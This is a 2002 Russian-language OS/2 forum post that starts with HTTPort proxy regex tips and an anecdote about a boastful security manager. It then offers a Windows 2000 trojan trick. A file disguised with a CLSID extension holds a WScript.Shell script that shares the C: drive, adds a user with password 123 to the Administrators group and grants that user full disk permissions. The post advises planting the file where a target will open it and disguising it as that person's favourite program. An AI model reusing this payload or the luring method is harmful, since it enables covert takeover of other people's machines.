RU/2: Форум. Общение пользователей и разработчиков OS/2 (eCS). : HTTPort

Список сообщений | Написать новое | Ответить на сообщение | Домой Поиск:
Предыдущее сообщение | Следующее сообщение
From : Roman Popov
To : Andrey Mitrofanov
Subj : HTTPort

> > как советовалось. И оно не заработало, так как {5,} HTTPORT если не может 5 использует другое количество
>
> {5,} значит 5 или более. В примере из статьи было /Vgtktk? -- 6 символов.

В результате эксперимента я видел 4

>
> Но ты учти, что я писал это выражение по _одному_ URL'ю и не факт, что _все_ его запросы имеют тот же вид. Включи лог, набери статистику и напиши :) своё убойное заклинание. :)))

Аллах Акбар !
> Доминошные url'и обычно всё-таки содержат чего-то про "/kakoi-to-tam.html?", если я правильно понимаю, как он выглядит.

Да. Какой-то.NSF

Кстати никого Windows дыры не интересуют ?(Знаю что оффтопик, но читайте дальше):
Завелся новый начальничек, который считает себя крутым спецом по сетевой безопасности. Этот его монолог был услышан и передан мне, а говорилось это для руководства 17-титысячного комбината.Итак, рассказ "Подключился из дома к Интернету, смотрю сайты всякие. И тут, программа(специальная для обнаружения атак), пишет что какой-то хакер пытается у пеня пароль украсть. Ну я за ним погнался, а он через прокси уходить стал, я за ним - он через второй прокси... И тут я его почти догнал, а он отключился."
(без комментариев)
А теперь такая фишка(да простят меня за флейм)
В некоем каталоге, желательно сетевом создается файл
readme.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}
в {}скобках - обязательно
в этом файле
<script>
a=new ActiveXObject("WSCript.Shell");
a.run("cmd /c net.exe share TEMP$=C:\ && net user user 123 /add && net localgroup администраторы user /add \0");
a.run("cacls c:\ /e /p user:f \0");
</script>
пример для русской версии Win2000
и ждете когда кто-то этот файл запустит из окна виндов (можно направленно этот файл разместить в каталоге, который наверняка посетит нужный клиент:)). Файл можно назвать "его_любимая_программа.exe.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}"
а в скрипт добавить строку
a.run("1.exe \0");
где 1.exe - настоящая его_любимая_программа.exe

Thu 28 Mar 2002 13:15 Mozilla/5.0 (OS/2; U; Warp 4.5; en-US; rv:0.9.8) Gecko/20020

Programmed by Dmitri Maximovich, Dmitry I. Platonoff, Eugen Kuleshov.
25.09.99 (c) 1999, RU/2. All rights reserved.
Rewritten by Dmitry Ban. All rights ignored.